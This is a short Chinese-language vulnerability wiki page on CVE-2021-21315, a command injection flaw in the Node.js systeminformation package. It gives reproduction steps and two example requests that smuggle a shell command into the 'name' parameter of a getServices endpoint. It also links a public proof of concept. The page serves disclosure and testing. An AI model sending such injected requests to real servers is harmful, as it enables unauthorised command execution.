menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Node.js命令注入漏洞(CVE-2021-21315).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Node.js命令注入漏洞(CVE-2021-21315).md
    1.04 KB / 2021-05-21 09:14:38
        # Node.js命令注入漏洞(CVE-2021-21315)


Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息。自发布至今,systeminformation软件包下载次数近3400万。2021年02月24日,npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。目前该漏洞已经在5.3.1版本中修复。

**复现步骤:**

* 1.Linux服务器环境上运行应用程序
* 2.向site.com/api/getServices?name=nginx 发送GET请求
* 3.发送

PoC:https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

```
yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)
yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)
```

**ref:**

* https://www.venustech.com.cn/new_type/aqtg/20210225/22407.html
* https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
    links
    file_download